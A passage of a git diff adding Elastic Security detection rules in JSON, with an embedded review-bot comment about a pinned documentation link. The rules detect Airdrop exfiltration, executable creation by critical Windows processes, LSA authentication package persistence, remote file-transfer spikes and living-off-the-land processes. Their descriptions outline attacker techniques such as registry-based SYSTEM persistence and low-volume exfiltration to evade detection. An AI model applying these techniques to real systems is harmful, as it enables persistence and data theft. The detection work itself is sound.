If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 105 + }, + "id": "e9001ee6-2d00-4d2f-849e-b8b1fb05234c_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e92c99b6-c547-4bb6-b244-2f27394bc849_3.json b/packages/security_detection_engine/kibana/security_rule/e92c99b6-c547-4bb6-b244-2f27394bc849_3.json new file mode 100644 index 00000000000..0e79bda6675 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e92c99b6-c547-4bb6-b244-2f27394bc849_3.json 
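Review bot: The `setup` text links the agent-policy helper guide at `https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html`, a version-pinned URL, while every other link in the same block uses `current`; the pinned page will drift from the rest of the guide as the stack moves on, so `https://www.elastic.co/guide/en/fleet/current/agent-policy.html` keeps the block consistent. The identical pinned link appears in the setup text of the `e7cb3cfd-aaa3-4d7b-af18-23b89955062c_8.json` hunk at the top of this chunk (whose start is outside this view), so the same fix applies there.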
@@ -0,0 +1,60 @@ +{ + "attributes": { + "anomaly_threshold": 75, + "author": [ + "Elastic" + ], + "description": "A machine learning job has detected high bytes of data written to an external device via Airdrop. In a typical operational setting, there is usually a predictable pattern or a certain range of data that is written to external devices. An unusually large amount of data being written is anomalous and can signal illicit data copying or transfer activities.", + "from": "now-2h", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "ded_high_bytes_written_to_external_device_airdrop", + "name": "Spike in Bytes Sent to an External Device via Airdrop", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/ded", + "https://www.elastic.co/blog/detect-data-exfiltration-activity-with-kibanas-new-integration" + ], + "related_integrations": [ + { + "package": "ded", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "risk_score": 21, + "rule_id": "e92c99b6-c547-4bb6-b244-2f27394bc849", + "setup": "## Setup\n\nThe rule requires the Data Exfiltration Detection integration assets to be installed, as well as network and file events collected by integrations such as Elastic Defend and Network Packet Capture (for network events only). \n\n### Data Exfiltration Detection Setup\nThe Data Exfiltration Detection integration detects data exfiltration activity by identifying abnormalities in network and file events. Anomalies are detected using Elastic's Anomaly Detection feature. 
\n\n#### Prerequisite Requirements:\n- Fleet is required for Data Exfiltration Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- File events collected by the Elastic Defend integration.\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n#### The following steps should be executed to install assets associated with the Data Exfiltration Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Data Exfiltration Detection and select the integration to see more details about it.\n- Under Settings, click Install Data Exfiltration Detection assets and follow the prompts to install the assets.\n\n#### Anomaly Detection Setup\nBefore you can enable rules for Data Exfiltration Detection, you'll need to enable the corresponding Anomaly Detection jobs. \n- Go to the Kibana homepage. Under Analytics, click Machine Learning.\n- Under Anomaly Detection, click Jobs, and then click \"Create job\". Select the Data View containing your file events. 
For example, this would be `logs-endpoint.events.*` if you used Elastic Defend to collect events.\n- If the selected Data View contains events that match the query in [this](https://github.com/elastic/integrations/blob/main/packages/ded/kibana/ml_module/ded-ml.json) configuration file, you will see a card for Data Exfiltration Detection under \"Use preconfigured jobs\".\n- Keep the default settings and click \"Create jobs\" to start the anomaly detection jobs and datafeeds.\n", + "severity": "low", + "tags": [ + "Use Case: Data Exfiltration Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Exfiltration" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1011", + "name": "Exfiltration Over Other Network Medium", + "reference": "https://attack.mitre.org/techniques/T1011/" + } + ] + } + ], + "type": "machine_learning", + "version": 3 + }, + "id": "e92c99b6-c547-4bb6-b244-2f27394bc849_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e94262f2-c1e9-4d3f-a907-aeab16712e1a_110.json b/packages/security_detection_engine/kibana/security_rule/e94262f2-c1e9-4d3f-a907-aeab16712e1a_110.json new file mode 100644 index 00000000000..2f5dff20afe --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e94262f2-c1e9-4d3f-a907-aeab16712e1a_110.json 
@@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies an unexpected executable file being created or modified by a Windows system critical process, which may indicate activity related to remote code execution or other forms of exploitation.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual Executable File Creation by a System Critical Process", + "note": "## Triage and analysis\n\n### Investigating Unusual Executable File Creation by a System Critical Process\n\nWindows internal/system processes have some characteristics that can be used to spot suspicious activities. One of these characteristics is file operations.\n\nThis rule looks for the creation of executable files done by system-critical processes. This can indicate the exploitation of a vulnerability or a malicious process masquerading as a system-critical process.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n file.extension : (\"exe\", \"dll\") and\n process.name : (\"smss.exe\",\n \"autochk.exe\",\n \"csrss.exe\",\n \"wininit.exe\",\n \"services.exe\",\n \"lsass.exe\",\n \"winlogon.exe\",\n \"userinit.exe\",\n \"LogonUI.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "e94262f2-c1e9-4d3f-a907-aeab16712e1a", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: 
Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1211", + "name": "Exploitation for Defense Evasion", + "reference": "https://attack.mitre.org/techniques/T1211/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1203", + "name": "Exploitation for Client Execution", + "reference": "https://attack.mitre.org/techniques/T1203/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "e94262f2-c1e9-4d3f-a907-aeab16712e1a_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e94262f2-c1e9-4d3f-a907-aeab16712e1a_111.json b/packages/security_detection_engine/kibana/security_rule/e94262f2-c1e9-4d3f-a907-aeab16712e1a_111.json new file mode 100644 index 00000000000..06df4226ded --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e94262f2-c1e9-4d3f-a907-aeab16712e1a_111.json 
@@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies an unexpected executable file being created or modified by a Windows system critical process, which may indicate activity related to remote code execution or other forms of exploitation.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.file-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual Executable File Creation by a System Critical Process", + "note": "## Triage and analysis\n\n### Investigating Unusual Executable File Creation by a System Critical Process\n\nWindows internal/system processes have some characteristics that can be used to spot suspicious activities. One of these characteristics is file operations.\n\nThis rule looks for the creation of executable files done by system-critical processes. This can indicate the exploitation of a vulnerability or a malicious process masquerading as a system-critical process.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n file.extension : (\"exe\", \"dll\") and\n process.name : (\"smss.exe\",\n \"autochk.exe\",\n \"csrss.exe\",\n \"wininit.exe\",\n \"services.exe\",\n \"lsass.exe\",\n \"winlogon.exe\",\n \"userinit.exe\",\n \"LogonUI.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "e94262f2-c1e9-4d3f-a907-aeab16712e1a", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: 
Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1211", + "name": "Exploitation for Defense Evasion", + "reference": "https://attack.mitre.org/techniques/T1211/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1203", + "name": "Exploitation for Client Execution", + "reference": "https://attack.mitre.org/techniques/T1203/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "e94262f2-c1e9-4d3f-a907-aeab16712e1a_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e9abe69b-1deb-4e19-ac4a-5d5ac00f72eb_105.json b/packages/security_detection_engine/kibana/security_rule/e9abe69b-1deb-4e19-ac4a-5d5ac00f72eb_105.json new file mode 100644 index 00000000000..5116c17fabb --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e9abe69b-1deb-4e19-ac4a-5d5ac00f72eb_105.json 
@@ -0,0 +1,107 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Adversaries can use the autostart mechanism provided by the Local Security Authority (LSA) authentication packages for privilege escalation or persistence by placing a reference to a binary in the Windows registry. The binary will then be executed by SYSTEM when the authentication packages are loaded.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.registry-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential LSA Authentication Package Abuse", + "query": "registry where host.os.type == \"windows\" and event.type == \"change\" and\n registry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Lsa\\\\Authentication Packages\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Lsa\\\\Authentication Packages\"\n ) and\n /* exclude SYSTEM SID - look for changes by non-SYSTEM user */\n not user.id : \"S-1-5-18\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "e9abe69b-1deb-4e19-ac4a-5d5ac00f72eb", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + 
"subtechnique": [ + { + "id": "T1547.002", + "name": "Authentication Package", + "reference": "https://attack.mitre.org/techniques/T1547/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.002", + "name": "Authentication Package", + "reference": "https://attack.mitre.org/techniques/T1547/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 105 + }, + "id": "e9abe69b-1deb-4e19-ac4a-5d5ac00f72eb_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e9b0902b-c515-413b-b80b-a8dcebc81a66_3.json b/packages/security_detection_engine/kibana/security_rule/e9b0902b-c515-413b-b80b-a8dcebc81a66_3.json new file mode 100644 index 00000000000..7201319a122 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e9b0902b-c515-413b-b80b-a8dcebc81a66_3.json 
@@ -0,0 +1,61 @@ +{ + "attributes": { + "anomaly_threshold": 70, + "author": [ + "Elastic" + ], + "description": "A machine learning job has detected an abnormal volume of remote files shared on the host indicating potential lateral movement activity. One of the primary goals of attackers after gaining access to a network is to locate and exfiltrate valuable information. Attackers might perform multiple small transfers to match normal egress activity in the network, to evade detection.", + "from": "now-90m", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "lmd_high_count_remote_file_transfer", + "name": "Spike in Remote File Transfers", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/lmd", + "https://www.elastic.co/blog/detecting-lateral-movement-activity-a-new-kibana-integration", + "https://www.elastic.co/blog/remote-desktop-protocol-connections-elastic-security" + ], + "related_integrations": [ + { + "package": "lmd", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "risk_score": 21, + "rule_id": "e9b0902b-c515-413b-b80b-a8dcebc81a66", + "setup": "## Setup\n\nThe rule requires the Lateral Movement Detection integration assets to be installed, as well as file and Windows RDP process events collected by the Elastic Defend integration. \n\n### Lateral Movement Detection Setup\nThe Lateral Movement Detection integration detects lateral movement activity by identifying abnormalities in file and Windows RDP events. 
Anomalies are detected using Elastic's Anomaly Detection feature.\n\n#### Prerequisite Requirements:\n- Fleet is required for Lateral Movement Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- File events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) integration.\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n#### The following steps should be executed to install assets associated with the Lateral Movement Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Lateral Movement Detection and select the integration to see more details about it.\n- Under Settings, click Install Lateral Movement Detection assets and follow the prompts to install the assets.\n\n#### Anomaly Detection Setup\nBefore you can enable rules for Lateral Movement Detection, you'll need to enable the corresponding Anomaly Detection jobs.\n- Go to the Kibana homepage. Under Analytics, click Machine Learning.\n- Under Anomaly Detection, click Jobs, and then click \"Create job\". Select the Data View containing your file events. 
For example, this would be `logs-endpoint.events.*` if you used Elastic Defend to collect events.\n- If the selected Data View contains events that match the query in [this](https://github.com/elastic/integrations/blob/main/packages/lmd/kibana/ml_module/lmd-ml.json) configuration file, you will see a card for Lateral Movement Detection under \"Use preconfigured jobs\".\n- Keep the default settings and click \"Create jobs\" to start the anomaly detection jobs and datafeeds.\n", + "severity": "low", + "tags": [ + "Use Case: Lateral Movement Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Lateral Movement" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1210", + "name": "Exploitation of Remote Services", + "reference": "https://attack.mitre.org/techniques/T1210/" + } + ] + } + ], + "type": "machine_learning", + "version": 3 + }, + "id": "e9b0902b-c515-413b-b80b-a8dcebc81a66_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ea09ff26-3902-4c53-bb8e-24b7a5d029dd_3.json b/packages/security_detection_engine/kibana/security_rule/ea09ff26-3902-4c53-bb8e-24b7a5d029dd_3.json new file mode 100644 index 00000000000..9466b14b768 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ea09ff26-3902-4c53-bb8e-24b7a5d029dd_3.json 
@@ -0,0 +1,66 @@ +{ + "attributes": { + "anomaly_threshold": 75, + "author": [ + "Elastic" + ], + "description": "A machine learning job has detected a suspicious Windows process. This process has been classified as malicious in two ways. It was predicted to be malicious by the ProblemChild supervised ML model, and it was found to be an unusual child process name, for the parent process, by an unsupervised ML model. Such a process may be an instance of suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules.", + "from": "now-45m", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "problem_child_rare_process_by_parent", + "name": "Unusual Process Spawned by a Parent Process", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/problemchild", + "https://www.elastic.co/security-labs/detecting-living-off-the-land-attacks-with-new-elastic-integration" + ], + "related_integrations": [ + { + "package": "problemchild", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "risk_score": 21, + "rule_id": "ea09ff26-3902-4c53-bb8e-24b7a5d029dd", + "setup": "## Setup\n\nThe rule requires the Living off the Land (LotL) Attack Detection integration assets to be installed, as well as Windows process events collected by integrations such as Elastic Defend or Winlogbeat. 
\n\n### LotL Attack Detection Setup\nThe LotL Attack Detection integration detects living-off-the-land activity in Windows process events.\n\n#### Prerequisite Requirements:\n- Fleet is required for LotL Attack Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- Windows process events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) integration or Winlogbeat(https://www.elastic.co/guide/en/beats/winlogbeat/current/_winlogbeat_overview.html).\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n- To set up and run Winlogbeat, follow [this](https://www.elastic.co/guide/en/beats/winlogbeat/current/winlogbeat-installation-configuration.html) guide.\n\n#### The following steps should be executed to install assets associated with the LotL Attack Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Living off the Land Attack Detection and select the integration to see more details about it.\n- Under Settings, click Install Living off the Land Attack Detection assets and follow the prompts to install the assets.\n\n#### Ingest Pipeline Setup\nBefore you can enable this rule, you'll need to enrich Windows process events with predictions from the Supervised LotL Attack Detection model. 
This is done via the ingest pipeline named `-problem_child_ingest_pipeline` installed with the LotL Attack Detection package.\n- If using an Elastic Beat such as Winlogbeat, add the LotL ingest pipeline to it by adding a simple configuration [setting](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest.html#pipelines-for-beats) to `winlogbeat.yml`.\n- If adding the LotL ingest pipeline to an existing pipeline, use a [pipeline processor](https://www.elastic.co/guide/en/elasticsearch/reference/current/pipeline-processor.html).\n\n#### Adding Custom Mappings\n- Go to the Kibana homepage. Under Management, click Stack Management.\n- Under Data click Index Management and navigate to the Component Templates tab.\n- Templates that can be edited to add custom components will be marked with a @custom suffix. Edit the @custom component template corresponding to the beat/integration you added the LotL ingest pipeline to, by pasting the following JSON blob in the \"Load JSON\" flyout:\n```\n{\n \"properties\": {\n \"problemchild\": {\n \"properties\": {\n \"prediction\": {\n \"type\": \"long\"\n },\n \"prediction_probability\": {\n \"type\": \"float\"\n }\n }\n },\n \"blocklist_label\": {\n \"type\": \"long\"\n }\n }\n}\n```\n\n### Anomaly Detection Setup\nBefore you can enable this rule, you'll need to enable the corresponding Anomaly Detection job. \n- Go to the Kibana homepage. Under Analytics, click Machine Learning.\n- Under Anomaly Detection, click Jobs, and then click \"Create job\". Select the Data View containing your enriched Windows process events. 
For example, this would be `logs-endpoint.events.*` if you used Elastic Defend to collect events, or `winlogbeat-*` if you used Winlogbeat.\n- If the selected Data View contains events that match the query in [this](https://github.com/elastic/integrations/blob/main/packages/problemchild/kibana/ml_module/problemchild-ml.json) configuration file, you will see a card for \"Living off the Land Attack Detection\" under \"Use preconfigured jobs\".\n- Keep the default settings and click \"Create jobs\" to start the anomaly detection job and datafeed.\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Living off the Land Attack Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/" + } + ] + } + ], + "type": "machine_learning", + "version": 3 + }, + "id": "ea09ff26-3902-4c53-bb8e-24b7a5d029dd_3", + "type": "security-rule" +} \ No newline at end of file diff --git 